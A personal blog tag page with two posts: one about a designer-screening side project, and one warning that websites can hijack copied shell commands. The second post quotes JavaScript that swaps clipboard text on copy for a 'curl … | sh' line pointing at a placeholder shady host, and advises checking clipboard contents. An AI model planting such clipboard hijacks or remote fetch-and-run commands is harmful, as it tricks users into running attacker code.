Tag Archives: JavaScript

Helping to hire designers with designchallenge.io

Started a little (well, maybe not exactly that little, given that it wasn’t as quick as I’ve thought) project with my friends to aid the designer positions candidate pre-interview screening through several simple challenges, akin to what hackerrank, codility etc. do for software developers – for now https://designchallenge.io/ serves only a landing page, but we will hopefully publish more functionality soon-ish.

Tech-wise it’s been (and it still is) a good exercise on Node.js + Express + Vue.js + Typescript stack, which I was only vaguely familiar with before, and also on using cloud providers like Heroku to deploy and host everything (well, not exactly everything, as images need to be hosted on S3 or some other storage provider). Quite a lot of knowledge gain, but quite a lot of fun too!

Copying shell commands from websites

There are quite a few websites – like Homebrew, for instance – that offer initial installation in a form of shell script that downloads installation binary and runs it (or does some other actions like saving specific values to a configuration file). I always had some vague concern about copying and running commands, but then again, you could read those commands and judge for yourself if they’re malicious or not, right? Yes, but…

I stumbled upon an article today that highlighted how the copied code could be not what it seems – or rather, it’d replace copied text with something else: https://briantracy.xyz/writing/copy-paste-shell.html

It’s quite ingenious, really – it hooks onto copy event and it replaces clipboard data with another command, that’d even have a newline at the end so it’d launch after you paste it automatically. Here’s the code from the article:

document.getElementById('copyme').addEventListener('copy', function(e) {
    e.clipboardData.setData('text/plain', 
        'echo "this could have been [curl http://myShadySite.com | sh]"\n'
    );
    e.preventDefault();
});

Now, you need to land on a frankly malicious website that’d do such a trick to you, but there also might be an XSS on an honest website that could utilise that. One way to safeguard yourself would be check your clipboard content (I use Alfred for OSX, it has an amazing feature of clipboard history), or paste the copied data in text editor or any non-shell text field to validate it’s what you expect it to be.

Live and learn!